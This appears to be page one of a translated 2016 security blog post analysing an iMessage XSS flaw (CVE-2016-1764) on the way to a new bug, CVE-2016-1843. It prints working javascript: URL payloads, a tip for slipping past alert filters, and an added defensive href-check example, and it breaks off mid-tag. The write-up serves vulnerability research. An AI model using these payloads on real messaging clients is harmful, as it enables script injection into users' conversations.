
From an Old Vulnerability to a New One: A Record of Hunting an iMessage 0day (CVE-2016-1843)

[Category: Front-end (JavaScript) | Posted by 店小二03 | 2016 | Poster: 红领巾]

Author: SuperHei (Knownsec 404 Security Lab, 知道创宇404安全实验室) Date: 2016-04-08

Note: the "0day" discussed in this article was assigned CVE-2016-1843 after it was reported to the vendor.

0x00 Background

A few days ago, researchers abroad published the details of an iMessage XSS vulnerability (CVE-2016-1764) that had been fixed in the March update:

https://www.bishopfox.com/blog/2016/04/if-you-cant-break-crypto-break-the-client-recovery-of-plaintext-imessage-data/
https://github.com/BishopFox/cve-2016-1764

The details they published do not actually include an analysis of the exact trigger point. After analyzing it myself, I found a new 0day based on exactly this information.

0x01 Analysis of CVE-2016-1764

The simplest trigger payload in CVE-2016-1764 is javascript://a/research?%0d%0aprompt(1). This is obviously a small trick in the javascript: scheme: the %0d%0a (CR LF) is not handled, so after decoding the line break ends the // comment and the prompt(1) that follows it is executed, which gives the XSS. This trick is fairly common when hunting XSS bugs.
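As an added example (not code from the original post or from the BishopFox writeup), the following JavaScript decodes the payload above to show why the CR LF turns a comment into executable code, and contrasts it with an href check that normalizes the scheme the way a URL parser does before deciding whether a link may be rendered; the scheme allowlist and the function names are my own assumptions.

```javascript
// Added example, not from the original post. Assumption: the client
// percent-decodes the body of a javascript: URL before evaluating it,
// as a browser does.

// Return the script body a javascript: URL would evaluate, after percent-decoding.
function javascriptUrlBody(href) {
  const m = /^javascript:(.*)$/is.exec(href);
  if (!m) return null;
  return decodeURIComponent(m[1]);
}

// Split the decoded body into lines. A line that starts with "//" is a JS
// line comment and contributes no code; anything else is executable. This
// shows why "//a/research?" alone is harmless but "\r\nprompt(1)" is not.
function executableLines(body) {
  return body
    .split(/\r\n|\r|\n|\u2028|\u2029/)
    .map((line) => line.trim())
    .filter((line) => line.length > 0 && !line.startsWith('//'));
}

// Defender check (assumed allowlist): strip leading/trailing C0 controls and
// spaces, drop ASCII tab/newline inside the scheme, compare the scheme
// case-insensitively, and only allow a small set of schemes. A link whose
// scheme is javascript: is rejected no matter what follows the colon.
const ALLOWED_SCHEMES = new Set(['http', 'https', 'mailto']);

function isSafeHref(href) {
  const stripped = href
    .replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, '')
    .replace(/[\t\n\r]/g, '');
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(stripped);
  if (!m) return true; // relative URL, no explicit scheme
  return ALLOWED_SCHEMES.has(m[1].toLowerCase());
}

// Constructed input: the CVE-2016-1764 trigger payload quoted in the post.
const PAYLOAD = 'javascript://a/research?%0d%0aprompt(1)';
```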

One thing worth pointing out is why prompt(1) is used instead of the usual alert(1). In my own tests alert really does not pop up, and besides, many websites simply filter alert outright. So the reminder here is that when testing for XSS, swapping alert for prompt is worth doing.

To analyze a client-side XSS like this, the first step should be to look at location.href, mainly to see which domain you are running under. This vulnerability runs under the applewebdata:// scheme, which the original analysis already gives. Next you need the concrete trigger point. In a browser we can normally read the HTML source to work that out, but in a client application you usually cannot see it, so here is a small trick:

javascript://a/research?%0d%0aprompt(1,document.head.innerHTML)

Here is the head of the HTML:

<style>@media screen and (-webkit-device-pixel-ratio:2) {}</style><link rel="stylesheet" type="text/css" href="file:///System/Library/PrivateFrameworks/SocialUI.framework/Resources/balloons-modern.css">

Now the body:

javascript://a/research?%0d%0aprompt(1,document.body.innerHTML)

<chatitem id="v:[email protected]/E4BCBB48-9286-49EC-BA1D-xxxxxxxxxxxx" contiguous="no" role="heading" aria-level="1" item-type="header">
<header guid="v:[email protected]/E4BCBB48-9286-49EC-BA1D-xxxxxxxxxxxx">
<headermessage text-direction="ltr">与“[email protected].com”进行 iMessage 通信</headermessage>
</header>
</chatitem>
<chatitem id="d:E4BCBB48-9286-49EC-BA1D-xxxxxxxxxxxx" contiguous="no" role="heading" aria-level="2" item-type="timestamp">
<timestamp guid="d:E4BCBB48-9286-49EC-BA1D-xxxxxxxxxxxx" id="d:E4BCBB48-9286-49EC-BA1D-xxxxxxxxxxxx">
<date date="481908183.907740">今天 23:23</date>
</timestamp>
</chatitem>
<chatitem id="p:0/E4BCBB48-9286-49EC-BA1D-xxxxxxxxxxxx" contiguous="no" chatitem-message="yes" role="presentation" display-type="balloon" item-type="text" group-last-message-ignore-timestamps="yes" group-first-message-ignore-timestamps="yes"


Page 1 of 2 | Source: http://www.codesec.net/view/482061.html

